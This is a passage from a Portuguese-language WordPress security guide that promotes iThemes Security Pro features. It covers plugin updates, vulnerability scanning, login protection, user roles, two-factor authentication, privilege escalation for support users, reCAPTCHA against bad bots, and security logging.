O Projeto Zero do Google tem diretrizes semelhantes no que diz respeito à divulgação de vulnerabilidades. Eles publicam todos os detalhes da vulnerabilidade após 90 dias, independentemente de a vulnerabilidade ter sido corrigida ou não.

Aprendendo a atualizar: o caminho mais difícil

No final de 2018, os hackers estavam aproveitando ativamente uma exploração no plug-in de conformidade WP GDPR. O Exploit permitiu que usuários não autorizados - pessoas não conectadas a um site da Web - modificassem as configurações de registro de usuário do WP e alterassem a nova função de usuário padrão de assinante para administrador. Felizmente, os desenvolvedores do plugin WP GDPR Compliance agiram rápido e lançaram um patch para a vulnerabilidade no dia seguinte à sua divulgação pública.

Mas, assim como no Exploit Wednesday, os hackers atacaram a vulnerabilidade mesmo que um patch tenha sido lançado. Nos dias e semanas que se seguiram ao divulgador de vulnerabilidade WP GDPR Compliance, recebemos uma enxurrada de relatórios de que sites do WordPress foram hackeados por invasores que exploravam a vulnerabilidade.

Ter um plugin ou tema vulnerável para o qual um patch está disponível, mas não aplicado é o principal culpado de sites WordPress hackeados. ISTO É TÃO FRUSTRANTE !!!!! Isso significa que a maioria dos hacks do WP poderia ter sido evitada.

É perturbador pensar em todas as pessoas que gastaram muito dinheiro para limpar seu site, a receita que perderam enquanto seus sites estavam fora do ar e a receita futura que perderam ao perder a confiança do cliente. Fica ainda mais perturbador quando você sabe que toda essa angústia poderia ter sido evitada com uma simples atualização.

O recurso de gerenciamento de versão do iThemes Security Pro permite personalizar e automatizar as atualizações do WordPress.

4. Acompanhe as vulnerabilidades do WordPress

Manter seus plug-ins e temas atualizados não o protegerá de todas as vulnerabilidades do WordPress. Alguns plug-ins e temas do WordPress foram abandonados pelos desenvolvedores que os criaram.

Infelizmente, se um plugin ou tema abandonado tiver uma vulnerabilidade, ele nunca receberá um patch. Os hackers terão como alvo sites que usam esses plug-ins agora permanentemente vulneráveis.

Se você abandonou um plug-in com uma vulnerabilidade conhecida em seu site, está dando aos hackers os planos de que eles precisam para assumir o controle de seu site. É por isso que você deve acompanhar todas as vulnerabilidades mais recentes.

É difícil controlar cada vulnerabilidade do WordPress divulgada e comparar essa lista com as versões de plug-ins e temas que você instalou em seu site. Acompanhar as vulnerabilidades é a diferença entre ter um site seguro e um que os hackers explorem facilmente.

Boas notícias para você! Acompanhamos e compartilhamos todas as vulnerabilidades divulgadas em nossos Roundups de Vulnerabilidades do WordPress.

5. Faça uma varredura em seu site em busca de vulnerabilidades

Uma maneira mais rápida de proteger o seu site de explorações fáceis de hackers é usar varreduras automatizadas para verificar se há vulnerabilidades conhecidas em seus sites.

O iThemes Security Pro Site Scanner é a sua maneira de automatizar a proteção contra vulnerabilidades em todos os seus sites WordPress. O Site Scanner verifica se há vulnerabilidades conhecidas em seu site e aplicará automaticamente um patch, se houver um disponível.

O site do iThemes Security Pro verifica três tipos de vulnerabilidades.

1. Vulnerabilidades do WordPress
2. Vulnerabilidades de plug-in
3. Vulnerabilidades de tema

O recurso iThemes Sync Pro Site Audit aproveita o poder do Google Lighthouse para proteger seu site. O Site Audit verifica e sinaliza páginas que incluem bibliotecas JavaScript front-end com vulnerabilidades de segurança conhecidas.

É uma prática comum para desenvolvedores usar código de terceiros - como bibliotecas JS - em seus plug-ins e temas. Infelizmente, se as bibliotecas não forem mantidas adequadamente, elas podem criar vulnerabilidades que os invasores podem aproveitar para hackear seu site. O uso de componentes com vulnerabilidades conhecidas está na lista dos 10 principais do OWASP.

A auditoria do site salvou meu bacon! Eu criei um cronograma de auditoria para que o Sync Pro execute auditorias automatizadas semanais e me envie os relatórios de auditoria por e-mail. Eu mantenho tudo atualizado e é por isso que fiquei chocado quando vi em uma das auditorias do meu site que estava usando bibliotecas JavaScript com vulnerabilidades de segurança conhecidas.

O relatório me apontou para uma versão desatualizada de jQuery no diretório WordPress do site repleto de vulnerabilidades conhecidas! Para minha sorte, vi em meu Sync Pro Site Audit que estava usando bibliotecas JavaScript com vulnerabilidades de segurança conhecidas e consegui resolver o problema antes que meu site fosse invadido.

Empacotando

Gerenciar adequadamente o software que faz seu site funcionar, incluindo seus plug-ins, temas e núcleo do WordPress, irá percorrer um longo caminho em sua estratégia de segurança do WordPress, protegendo seu site contra invasores online.

Seção 6: protegendo seu login do WordPress

O URL de login do WordPress é o mesmo para todos os sites do WordPress e não requer nenhuma permissão especial de acesso. Qualquer pessoa com experiência em WordPress sabe que a URL de login está localizada na página /wp-login.php .

A acessibilidade da página de login do WordPress a torna a parte mais atacada - e potencialmente a mais vulnerável - de qualquer site do WordPress. Felizmente para nós, o plugin iThemes Security Pro torna mais fácil proteger o seu login do WordPress.

Vamos dar uma olhada nas ferramentas do iThemes Security Pro que você pode usar para proteger o seu login do WordPress e torná-lo quase impenetrável!

1. Limite as tentativas de login

A primeira etapa para proteger seu login do WordPress é limitar as tentativas de login malsucedidas. Por padrão, não há nada embutido no WordPress para limitar o número de tentativas de login malsucedidas que alguém pode fazer. Sem um limite para o número de tentativas malsucedidas de login que um invasor pode fazer, ele pode continuar tentando uma combinação de diferentes nomes de usuário e senhas até encontrar um que funcione.

O recurso de proteção contra força bruta local do iThemes Security Pro mantém registros de tentativas de login inválidas feitas por um host ou endereço IP e um nome de usuário. Depois que um IP ou nome de usuário fizer muitas tentativas consecutivas de login inválido, ele será bloqueado e impedido de fazer mais tentativas por um determinado período de tempo.

Para começar a usar o recurso Local Brute Force Protection , habilite-o na página principal da página de configurações do iThemes Security Pro.

As configurações de proteção de força bruta local permitem que você defina os limites para bloqueios.

• Máximo de tentativas de login por host - O número de tentativas de login inválidas que um IP é permitido antes de ser bloqueado.
• Máximo de tentativas de login por usuário - Este é o número de tentativas de login inválidas que um nome de usuário é permitido antes de ser bloqueado.
• Minutos para lembrar login incorreto - Este é o tempo que uma tentativa de login inválido deve contar em relação a um IP ou nome de usuário para um bloqueio.
• Proibir automaticamente o usuário “admin” - Quando ativado, qualquer pessoa que use o nome de usuário Admin ao fazer login recebe um bloqueio automático.

Há algumas coisas que você deseja manter em mente ao definir as configurações de bloqueio. Você deseja mover tentativas de login inválidas para usuários do que você fornece IPs. Digamos que seu site esteja sob um ataque de força bruta e o invasor esteja usando seu nome de usuário. O objetivo é bloquear o IP do invasor e não o seu nome de usuário, para que você ainda possa fazer o login e realizar o trabalho, mesmo quando o seu site estiver sob ataque.

Você também não deseja tornar essas configurações muito restritas, definindo o número de tentativas de login inválidas muito baixo e o tempo para lembrar de tentativas inválidas muito longo. Se você diminuir o número de tentativas de login inválidas para hosts / IPs para 1 e definir os minutos para lembrar uma tentativa de login incorreta para um mês, estará aumentando drasticamente a probabilidade de bloquear inadvertidamente usuários legítimos.

2. Limite as tentativas de autenticação externa por solicitação

Existem outras maneiras de fazer login no WordPress além de usar um formulário de login. Usando XML-RPC, um invasor pode fazer centenas de nomes de usuário e tentativas de senha em uma única solicitação HTTP. O método de amplificação de força bruta permite que os invasores façam milhares de tentativas de nome de usuário e senha usando XML-RPC em apenas algumas solicitações HTTP.

Usando as configurações de Tweaks do WordPress do iThemes Security Pro, você pode bloquear várias tentativas de autenticação por solicitação XML-RPC. Limitar o número de tentativas de nome de usuário e senha a um para cada solicitação ajudará muito a proteger seu login do WordPress.

3. Proteção de força bruta da rede

Limitar as tentativas de login tem tudo a ver com proteção de força bruta local. A proteção de força bruta local analisa apenas as tentativas de acesso ao seu site e bane os usuários de acordo com as regras de bloqueio especificadas nas configurações de segurança.

A proteção de força bruta da rede leva isso um passo adiante. A rede é a comunidade iThemes Security e possui mais de um milhão de websites. Se um IP for identificado como tentativa de invadir sites da comunidade iThemes Security, o IP será adicionado à lista de banidos do Network Bruce Force.

Uma vez que um IP esteja na lista de banidos da Força Bruta da Rede, o IP será bloqueado em todos os sites da rede. Portanto, se um IP atacar meu site e for banido, será relatado à Rede de Força Bruta da iThemes Security. Meu relatório pode ajudar a banir o IP de toda a rede. Adoro poder ajudar a proteger o login do WordPress de outras pessoas apenas habilitando a proteção de rede de segurança do iThemes.

Para começar a usar o Network Force Protection , habilite-o na página principal das configurações de segurança.

Em seguida, insira seu endereço de e-mail, escolha se deseja ou não receber atualizações por e-mail e clique no botão Salvar .

4. Limite o acesso do dispositivo ao painel WP

A última etapa para proteger seu login do WordPress é limitar o acesso ao painel do WordPress a um conjunto de dispositivos. O recurso Dispositivos confiáveis ​​iThemes Security Pro identifica os dispositivos que você e outros usuários usam para fazer login no seu site WordPress. Quando um usuário faz login em um dispositivo não reconhecido, os Dispositivos confiáveis ​​podem restringir seus recursos de nível de administrador. Isso significa que um hacker foi capaz de contornar seus outros métodos de segurança de login - o que não é muito provável - eles não teriam a capacidade de fazer alterações maliciosas em seu site.

Para começar a usar Dispositivos confiáveis , habilite-os na página principal das configurações de segurança e clique no botão Definir configurações .

Nas configurações de Dispositivos confiáveis, decida quais usuários você deseja usar o recurso e ative os recursos Restringir capacidades e Proteção contra sequestro de sessão .

Depois de habilitar a nova configuração Dispositivos confiáveis, os usuários receberão uma notificação na barra de administração do WordPress sobre dispositivos pendentes não reconhecidos. Se o seu dispositivo atual não foi adicionado à lista de dispositivos confiáveis, clique no link Confirmar este dispositivo para enviar o e-mail de autorização .

Clique no botão Confirmar dispositivo no e-mail de login não reconhecido para adicionar seus dispositivos atuais à lista Dispositivos confiáveis.

Empacotando

A acessibilidade da página de login do WordPress a torna a parte mais atacada - e potencialmente vulnerável - de qualquer site do WordPress. No entanto, seguir as etapas desta seção tornará seu login do WordPress quase impenetrável.

Seção 7: protegendo seus usuários do WordPress

Sempre que falamos sobre segurança do usuário, muitas vezes ouvimos perguntas como, todos os usuários do WordPress devem ter os mesmos requisitos de segurança e o quanto segurança é segurança demais?

Não se preocupe. Nós respondemos a todas essas perguntas. Mas, primeiro, vamos falar sobre os diferentes tipos de usuários do WordPress.

Quais são os diferentes tipos de usuários do WordPress?

Existem 5 usuários padrão diferentes do WordPress.

1. Administrador
2. editor
3. Autor
4. Contribuinte
5. Assinante

Cada usuário possui recursos diferentes. Os recursos determinam o que eles podem fazer ao acessar o painel. Leia mais sobre as funções e permissões do usuário do WordPress.

O dano potencial de diferentes usuários do WordPress hackeados

Antes que possamos entender como proteger nossos usuários do WordPress, devemos primeiro entender o nível de ameaça de cada tipo de usuário comprometido. O tipo e o nível de dano que um invasor pode infligir varia muito, dependendo das funções e capacidades do usuário que ele hackear.

Administrador - Nível de ameaça alto

Os usuários administradores podem fazer o que quiserem.

• Crie, remova e modifique usuários.
• Instale, remova e edite plug-ins e temas.
• Crie, remova e edite todas as postagens e páginas.
• Publique e cancele a publicação de postagens e páginas.
• Adicione e remova mídia.

Se um hacker conseguir colocar as mãos em um dos administradores do seu site, ele poderá retê-lo como resgate. Como mencionamos anteriormente, Ransomware se refere a quando um hacker assume o controle do seu site e não o libera de volta para você, a menos que você pague uma taxa elevada.

Editor - Nível de ameaça alto

O Editor gerencia todo o conteúdo do site. Esses usuários ainda têm um pouco de poder.

• Crie, exclua e edite todas as postagens e páginas.
• Publique e cancele a publicação de todos os posts e páginas.
• Faça upload de arquivos de mídia.
• Gerenciar todos os links.
• Gerenciar comentários.
• Gerenciar categorias.

Se um invasor assumir o controle de uma conta do Editor, ele pode modificar uma de suas páginas para usar em um ataque de phishing. Phishing é um tipo de ataque usado para roubar dados do usuário, incluindo credenciais de login e números de cartão de crédito.

Phishing é uma das maneiras mais seguras de colocar seu site na lista negra do Google. A cada dia, 10.000 sites entram na lista de bloqueio do Google por vários motivos.

Autor - Nível Médio de Ameaça

O autor foi projetado para criar e gerenciar seu próprio conteúdo.

• Crie, exclua e edite seus próprios posts e páginas.
• Publique e cancele a publicação de suas próprias postagens.
• Carregar arquivos de mídia

Se um invasor obtiver o controle da conta de um Autor, ele pode criar páginas e postagens que enviam os visitantes do seu site a sites maliciosos.

Contribuidor e assinante - baixo nível de ameaça

O Colaborador é a versão simplificada da função de usuário Autor. Eles não têm poder de publicação.

• Crie e edite suas próprias postagens.
• Exclua suas próprias postagens não publicadas.

O Assinante pode ler coisas que os outros usuários publicam.

Embora os hackers com função de Contribuidor ou Assinante não possam fazer alterações maliciosas, eles podem roubar qualquer informação sensível armazenada na conta do usuário ou página de perfil.

6 dicas para proteger seus usuários do WordPress

Ok, isso é uma coisa bem desagradável que hackers podem fazer em nossos sites. A boa notícia é que a maioria dos ataques às contas de usuário do WordPress podem ser evitados com apenas um pequeno esforço de sua parte.

Vamos dar uma olhada nas coisas que você pode fazer para proteger seus usuários do WordPress. A verdade é que esses métodos de segurança do WordPress ajudarão a proteger todo tipo de usuário do WordPress. Mas, à medida que examinamos cada um dos métodos, informaremos quais usuários você deve exigir para usar o método.

1. Apenas dê às pessoas as capacidades de que precisam

A maneira mais fácil de proteger seu site é fornecer aos usuários os recursos de que eles precisam e nada mais. Se a única coisa que alguém vai fazer em seu site é criar e editar suas próprias postagens de blog, eles não precisam da capacidade de editar as postagens de outras pessoas.

2. Proteja os usuários do WordPress com senhas fortes

Em uma lista compilada pela Splash Data, a senha mais comum incluída em todos os despejos de dados era 123456. Um despejo de dados é um banco de dados invadido cheio de senhas de usuário despejadas em algum lugar da Internet. Você consegue imaginar quantas pessoas em seu site usam uma senha fraca se 123456 for a senha mais comum em despejos de dados?

Usar uma senha fraca é como tentar trancar a porta da frente com um pedaço de fita adesiva. Nunca demorou muito para que os hackers abrissem caminho à força através de uma senha fraca e entrassem em um site. Agora que os hackers estão utilizando placas gráficas de computador em seus ataques, o tempo que leva para quebrar uma senha nunca foi menor.

Por exemplo, vamos dar uma olhada em um gráfico criado pela Terahash, uma empresa de quebra de senhas de alto desempenho. O gráfico mostra o tempo que leva para quebrar uma senha usando um cluster de hashstack de 448x RTX 2080s.

Por padrão, o WordPress usa MD5 para fazer o hash das senhas de usuário armazenadas no banco de dados WP. Portanto, de acordo com este gráfico, Terahash poderia quebrar uma senha de 8 caracteres ... quase que instantaneamente. Isso não é apenas superimpressionante, mas também assustador. A boa notícia é que podemos proteger nosso login do WordPress exigindo que nossos usuários de alto nível usem senhas fortes.

O recurso de Requisito de senha do iThemes Security Pro permite que você force usuários específicos a usar uma senha forte. Habilite o recurso Requisitos de senha na página principal das configurações de segurança e selecione os usuários que você deseja que usem uma senha forte.

3. Senhas comprometidas recusadas

De acordo com o Relatório de investigações de violação de dados da Verizon, mais de 70% dos funcionários reutilizam senhas no trabalho. Mas a estatística mais importante do relatório é que 81% das violações relacionadas a hackers aproveitaram senhas roubadas ou fracas.

Os hackers usam uma forma de ataque de força bruta chamada de ataque de dicionário. Um ataque de dicionário é um método de invadir um site WordPress com senhas comumente usadas que aparecem em despejos de banco de dados. A “Coleção nº 1? A violação de dados hospedada no MEGA incluiu 1.160.253.228 combinações exclusivas de endereços de e-mail e senhas. Isso é um bilhão com um b. Esse tipo de pontuação realmente ajudará um ataque de dicionário a restringir as senhas do WordPress mais comumente usadas.

É fundamental evitar que usuários com recursos de nível de autor ou superior usem senhas comprometidas para proteger seu login do WordPress. Você também pode pensar em não permitir que seus usuários de nível inferior usem senhas comprometidas.

É totalmente compreensível e encorajado a tornar a criação de uma nova conta de cliente o mais fácil possível. No entanto, seu cliente pode não saber que a senha que está usando foi encontrada em um despejo de dados. Você estaria prestando um grande serviço ao seu cliente, alertando-o sobre o fato de que a senha que ele está usando foi comprometida. Se eles estiverem usando essa senha em todos os lugares, você poderá evitá-los de grandes dores de cabeça no futuro.

O recurso Recusar senhas comprometidas do iThemes Security Pro força os usuários a usar senhas que não tenham aparecido em nenhuma violação de senha rastreada por Have I Been Pwned. Habilite o recurso Requisitos de senha na página principal das configurações de segurança e selecione os usuários que você deseja impedir de usar uma senha comprometida.

4. Proteja os usuários do WordPress com autenticação de dois fatores

Usar autenticações de dois fatores é a melhor coisa que você pode fazer para proteger seu login do WordPress. A autenticação de dois fatores é um processo de verificação da identidade de uma pessoa, exigindo dois métodos separados de verificação. O Google compartilhou em seu blog que o uso de autenticação de dois fatores pode impedir 100% dos ataques de bot automatizados. Eu realmente gosto dessas probabilidades.

O recurso de autenticação de dois fatores do iThemes Security Pro oferece muita flexibilidade ao implementar 2fa em seu site. Você pode habilitar dois fatores para todos ou alguns de seus usuários e pode forçar seus usuários de alto nível a usar 2fa em cada login.

Para sua conveniência, o iThemes Security Pro oferece 2 métodos diferentes de autenticação de dois fatores.

1. Aplicativo móvel - O método do aplicativo móvel é o método mais seguro de autenticação de dois fatores fornecido pelo iThemes Security Pro. Este método requer que você use um aplicativo móvel gratuito de dois fatores como o Authy.
2. E - mail - o método de e-mail de dois fatores enviará códigos urgentes para o endereço de e-mail do seu usuário.
3. Códigos de backup - Um conjunto de códigos de uso único que podem ser usados ​​para fazer o login no caso de perda do método principal de dois fatores.

5. Proteja os usuários do WordPress contra sequestro de sessão

O WordPress gera um cookie de sessão toda vez que você faz login em seu site. E digamos que você tenha uma extensão de navegador que foi abandonada pelo desenvolvedor e não está mais lançando atualizações de segurança. Infelizmente para você, a extensão do navegador negligenciada tem uma vulnerabilidade. A vulnerabilidade permite que atores mal-intencionados sequestrem os cookies do seu navegador, incluindo o cookie de sessão do WordPress mencionado anteriormente. Esse tipo de hack é conhecido como Session Hijacking . Portanto, um invasor pode explorar a vulnerabilidade da extensão para pegar carona em seu login e começar a fazer alterações maliciosas com seu usuário do WordPress.

Você deve ter proteção contra sequestro de sessão em vigor para seus administradores e editores.

O recurso de dispositivos confiáveis ​​do iThemes Security Pro torna o sequestro de sessão uma coisa do passado. Se o dispositivo de um usuário for alterado durante uma sessão, o iThemes Security desconectará automaticamente o usuário para evitar qualquer atividade não autorizada na conta do usuário, como alterar o endereço de e-mail do usuário ou enviar plug-ins maliciosos.

6. Crie um usuário de suporte universal

Sempre que você cria um novo usuário, está adicionando outro ponto de entrada que um hacker pode explorar. Mas provavelmente haverá momentos em que você precisará de alguma ajuda externa para o seu site, como quando você está procurando suporte ou depois de contratar um prestador de serviços independente. Você precisa de uma maneira segura de adicionar acesso de administrador temporário ao seu site.

Por exemplo, digamos que você tenha alguns problemas com um dos plug-ins instalados em seu site. Depois de entrar em contato com o suporte, eles solicitam acesso de administrador ao seu site para que possam ver mais de perto. Parece um pedido perfeitamente razoável e você decide conceder acesso a eles.

Então, como damos a alguém acesso de administrador temporário ao nosso site WordPress?

Concessão de acesso externo ao seu site: as duas opções

Normalmente, você tem duas opções para fornecer acesso externo ao seu site…. e nenhum deles é ótimo .

1. Compartilhe suas credenciais de usuário

Sua primeira e pior opção é compartilhar o nome de usuário e a senha do usuário administrador do WordPress.

Por que compartilhar suas credenciais de administrador é terrível

• Segurança reduzida - se você compartilhar suas credenciais de usuário, terá que desabilitar a autenticação de dois fatores para permitir que a pessoa que está usando suas credenciais faça o login. O Google compartilhou em seu blog que o uso de autenticação de dois fatores, ou verificação em duas etapas, pode impedir 100% dos ataques automatizados de bots. Desativar a autenticação de dois fatores, mesmo por um curto período de tempo, reduz drasticamente a segurança do seu site.
• Inconveniente - O compartilhamento de suas credenciais exige que você altere sua senha. Se você se esquecer de alterar sua senha, há uma ou mais pessoas que têm acesso de administrador ao seu site sempre que quiserem.

2 Crie um novo usuário para o técnico de suporte

Embora criar um novo usuário administrador para o especialista de suporte seja melhor do que compartilhar suas credenciais de administrador, ainda não é ótimo.

Por que criar um usuário para a tecnologia de suporte é terrível

• Vulnerabilidade aumentada - Criar um novo usuário administrador adiciona outro ponto de entrada que pode ser explorado. Se você não tiver uma política de senha em vigor, o técnico de suporte pode escolher uma senha fraca, tornando seu login do WordPress mais vulnerável a ataques.
• Inconveniente - Passar pelo processo de configuração de um novo usuário sempre que precisar de ajuda externa é demorado. Você deve criar o novo usuário e, em seguida, lembrar-se de excluí-lo quando ele não precisar mais de acesso ao seu site. É uma prática recomendada de segurança do WordPress remover todos os usuários não utilizados do seu site.

O que é escalonamento de privilégios?

O recurso de escalonamento de privilégios do iThemes Security Pro permite conceder a um usuário recursos extras temporariamente.

O escalonamento de privilégios torna fácil e seguro criar um usuário universal que você pode fornecer a qualquer desenvolvedor externo ou técnico de suporte que precise de acesso temporário ao seu site.

Com o Privilege Escalation, você pode criar um novo usuário e chamá-lo de Suporte e atribuir a ele a função de usuário Assinante. Na próxima vez que você precisar fornecer acesso temporário ao seu site, poderá transferir o usuário do Suporte de assinante para administrador. Veremos como fazer isso mais tarde na postagem, mas primeiro, vamos falar sobre por que o Privilege Escalation é a melhor maneira de conceder acesso ao seu site.

Por que o escalonamento de privilégios é melhor

• Fácil - você não precisa criar um novo usuário sempre que precisar conceder acesso ao seu site.
• Automático - O escalonamento de privilégios dura apenas 24 horas. Após 24 horas, o usuário perde automaticamente todos os privilégios adicionais. Você não precisa se lembrar de remover usuários ou alterar qualquer senha.
• Sem sacrifício na segurança - você ainda pode exigir que esse usuário de suporte universal use o método de e-mail de dois fatores para fazer o login, o que significa que você tem o mesmo nível de segurança que tem com seus outros usuários administradores. Como a função real do usuário é um assinante, você não corre nenhum risco real de deixá-lo em seu site.

Como usar o escalonamento de privilégios no iThemes Security Pro

Para começar, ative o escalonamento de privilégios na página principal das configurações de segurança.

Você pode criar um novo usuário e chamá-lo de Suporte e atribuir a ele a função de usuário Assinante. Na próxima vez que você precisar fornecer acesso temporário ao seu site, navegue até a página de perfil do usuário do suporte.

Atualize o endereço de e-mail para permitir que o funcionário externo do suporte solicite uma nova senha. Em seguida, role para baixo até ver as configurações de escalonamento de privilégio temporário. Clique no botão de alternância Definir função temporária e selecione Admin. O usuário agora terá acesso de administrador pelas próximas 24 horas.

Se eles não precisarem das 24 horas completas, você pode revogar o escalonamento de privilégios na página de perfil do usuário. Se precisar de mais de 24 horas, você pode definir o número exato de dias necessários no campo Dias .

Empacotando

A popularidade do WordPress o torna um alvo para hackers em todo o mundo. Como discutimos, um invasor pode causar danos ao hackear até mesmo o nível mais baixo de usuário do WordPress.

A boa notícia é que, embora não haja como evitar ataques aos usuários do WordPress, com um pouco de esforço de nossa parte, podemos evitar que os ataques sejam bem-sucedidos.

Seção 8: proteja seu site de bots ruins

Nesta seção do guia de segurança do WordPress, você aprenderá o que é um bot e como impedir que bots ruins criem confusão em seu site.

O que é um bot?

Um bot é um software programado para realizar uma lista específica de tarefas. Os desenvolvedores criam um conjunto de instruções que um bot seguirá automaticamente, sem que o desenvolvedor precise dizer a eles para começar. Os bots realizarão tarefas repetitivas e mundanas muito mais rápido do que nós.

Vários bots estão continuamente rastreando seu site. Alguns desses bots são bons e fornecem um serviço valioso. Outros bots têm motivos mais nefastos. Vamos conversar um pouco sobre o que é um bot e os diferentes tipos de bots.

Os bons bots

Monitorando bots - iThemes Sync Pro Uptime Monitoring usa um bot para monitorar o tempo de atividade do seu site. O bot verifica seu site a cada 5 minutos para verificar se ele ainda está online. Se o seu site estiver fora do ar, o bot enviará um alerta para que você possa colocar o seu site online novamente.

Bots de auditoria - O site de auditoria do iThemes Sync Pro usa um bot do Google Lighthouse para verificar a qualidade de suas páginas da web. Outro excelente exemplo de um bot de auditoria é um verificador de linker quebrado que rastreará seu site à procura de links que o enviam para um local que não existe.

Feeder Bots - Um excelente exemplo de feeder bot é o reprodutor de podcast. O reprodutor de podcast usa um bot para monitorar os feeds RSS dos podcasts que você assina e avisa quando o seu podcast favorito lança um novo episódio.

Bots de mecanismo de pesquisa - um rastreador da web do Google é um exemplo de bot de mecanismo de pesquisa. Este tipo de bot rastreará seu site à procura de páginas novas ou modificadas e criará um índice do seu site. Assim que o Google ou outro mecanismo de pesquisa tiver um índice do seu site, eles poderão compartilhar suas páginas com as pessoas que usam o mecanismo de pesquisa.

Bots de segurança - O iThemes Security Pro Site Scan usa um bot para comparar a lista de seus plug-ins e temas instalados com nosso banco de dados de vulnerabilidades. Se você tiver um plugin ou tema instalado com uma vulnerabilidade conhecida, o bot aplicará automaticamente um patch, se houver um disponível.

Os Bad Bots

Content Scraping Bots - Esses bots são programados para baixar o conteúdo do seu site sem sua permissão. O bot pode duplicar o conteúdo para usar no site do invasor para melhorar seu SEO e roubar o tráfego do site.

Spambots - Spambots são irritantes. Eles vão bagunçar seus comentários com promessas de se tornar um milionário enquanto trabalha em casa na esperança de enviar seus visitantes a sites maliciosos.

Bots de força bruta - os bots de força bruta vasculham a internet em busca de logins do WordPress para atacar. Assim que esses bots chegarem a uma página de login, eles tentarão a forma mais simples de obter acesso a um site: tentando adivinhar nomes de usuário e senhas, repetidamente, até que tenham sucesso.

Como bloquear bots ruins sem bloquear bots bons: reCAPTCHA V3

O reCAPTCHA do Google ajuda a evitar que bots mal-intencionados se envolvam em atividades abusivas no seu site, como tentativa de invadir o seu site usando senhas comprometidas, postar spam ou até mesmo copiar o seu conteúdo.

Usuários legítimos, no entanto, serão capazes de fazer login, fazer compras, visualizar páginas ou criar contas. O reCAPTCHA usa técnicas avançadas de análise de risco para diferenciar humanos de bots.

O recurso reCAPTCHA do Google no iThemes Security Pro protege seu site de robôs mal-intencionados. Esses bots estão tentando invadir seu site usando senhas comprometidas, postando spam ou até mesmo roubando seu conteúdo. O reCAPTCHA usa técnicas avançadas de análise de risco para diferenciar humanos de bots.

O que é ótimo sobre o reCAPTCHA versão 3 é que ele ajuda a detectar o tráfego abusivo de bots em seu site sem qualquer interação do usuário. Em vez de mostrar um desafio CAPTCHA, o reCAPTCHA v3 monitora as diferentes solicitações feitas em seu site e retorna uma pontuação para cada solicitação. A pontuação varia de 0,01 a 1. Quanto maior a pontuação retornada pelo reCAPTCHA, mais certeza se terá de que uma pessoa fez a solicitação. Quanto mais baixa for a pontuação retornada pelo reCAPTCHA, mais confiante será de que um bot fez a solicitação.

O iThemes Security Pro permite definir um limite de bloqueio usando a pontuação reCAPTCHA. O Google recomenda usar 0,5 como padrão. Lembre-se de que você pode bloquear inadvertidamente usuários legítimos se definir o limite muito alto.

Você pode ativar o reCAPTCHA em seu registro de usuário do WordPress, redefinir a senha, login e comentários. O iThemes Security Pro permite que você execute o script do Google reCAPTCHA em todas as páginas para aumentar a precisão de seu bot em comparação com a pontuação humana.

Empacotando

Existem bots bons e bots ruins. O reCAPTCHA bloqueia bots ruins do seu site sem atrapalhar os bots bons que fornecem valor.

Seção 9: registros de segurança do WordPress

O registro é uma parte essencial da sua estratégia de segurança do WordPress. O registro e o monitoramento insuficientes podem levar a um atraso na detecção de uma violação de segurança. A maioria dos estudos de violação mostra que o tempo para detectar uma violação é de mais de 200 dias! Esse período de tempo permite que um invasor viole outros sistemas, modifique, roube ou destrua mais dados. É por essas razões que Insufficient Logging pousou no OWASP 10 principais riscos de segurança de aplicativos da web.

Os logs de segurança do WordPress têm vários benefícios em sua estratégia geral de segurança.

1. Identifique e interrompa o comportamento malicioso.
2. Identifique atividades que podem alertá-lo sobre uma violação.
3. Avalie quanto dano foi feito.
4. Auxiliar no reparo de um site hackeado.

Se o seu site for hackeado, você desejará ter as melhores informações para ajudar em uma investigação e recuperação rápidas.

O que são logs de segurança do WordPress?

Os Logs de segurança do WordPress no iThemes Security Pro rastreiam eventos de segurança importantes que ocorrem em seu site. Esses eventos são importantes para monitorar para indicar se ou quando ocorre uma violação de segurança.

Os logs de segurança do seu site são uma parte vital de qualquer estratégia de segurança. As informações encontradas nesses registros podem ser usadas para bloquear atores mal-intencionados, destacar uma alteração indesejada no site e ajudar a identificar e corrigir o ponto de entrada de um ataque bem-sucedido.

Eventos de segurança rastreados e registrados por iThemes Security

Aqui está uma olhada nos eventos de segurança do WordPress rastreados pelo plugin iThemes Security Pro.

1. Ataques de força bruta do WordPress

Ataques de força bruta referem-se ao método de tentativa e erro usado para descobrir nomes de usuário e senhas para invadir um site. O WordPress não rastreia nenhuma atividade de login do usuário, então não há nada embutido no WordPress para protegê-lo de um ataque de força bruta. Depende de você monitorar a segurança do seu login para proteger o seu site WordPress.

Felizmente, um ataque de força bruta não é muito sofisticado e é muito fácil de identificar em seus logs. Você precisará registrar o nome de usuário e o IP que está tentando fazer o login e se o login foi bem-sucedido. Se você notar que um único nome de usuário ou IP tem tentativas consecutivas de login com falha, é provável que esteja sob um ataque de força bruta.

Depois de saber que seu site está sendo atacado, você pode acabar com isso! É importante lembrar que não há como evitar que um ataque ocorra ao seu site. Mas, monitorando as tentativas de login inválidas, você pode evitar que esses ataques sejam bem-sucedidos.

O iThemes Security Pro é ótimo para bloquear os bandidos. No entanto, se um bandido usasse o nome de usuário Bob em um ataque de força bruta e Bob fosse um usuário real no site, Bob seria, infelizmente, bloqueado junto com o invasor.

Embora seja ótimo impedir que bandidos invadam um site, não gostamos quando a segurança afeta a experiência dos usuários reais. Criamos Magic Links para permitir que usuários legítimos contornem o bloqueio de nome de usuário, enquanto o invasor de força bruta permanece bloqueado.

2. Verificações de malware

Você não deve apenas executar varreduras de malware, mas também deve registrar os resultados de cada varredura de malware em seus registros de segurança do WordPress. Alguns logs de segurança registram apenas os resultados da verificação que encontraram malware, mas isso não é suficiente. É fundamental ser alertado o mais rápido possível sobre uma violação do seu site. Quanto mais tempo você levar para saber sobre um hack, mais danos ele causará.

Embora seja bom ver o histórico de uma abordagem proativa à segurança compensando, isso é apenas um bônus e não a razão para registrar todas as varreduras de malware.

Se você não documentar suas varreduras programadas, não terá como saber se há alguma falha na varredura. Não registrar as varreduras com falha pode fazer com que você pense que seu site está sendo verificado diariamente em busca de malware, mas, na realidade, a varredura não consegue ser concluída.

Leia a postagem em destaque sobre o recurso Site Scan para saber como o iThemes Security Pro pode protegê-lo da causa número um de hacks do WordPress.

3. Atividade do usuário

Manter um registro da atividade do usuário em seus registros de segurança do WordPress pode ser sua graça salvadora após um ataque bem-sucedido.

Se você monitorar a atividade correta do usuário, pode guiá-lo pela linha do tempo de um hack e mostrar tudo o que o hacker mudou, desde a adição de novos usuários até a adição de anúncios farmacêuticos indesejados em seu site.

O iThemes Security Pro monitora 5 tipos de atividade do usuário:

1. Login / Logout

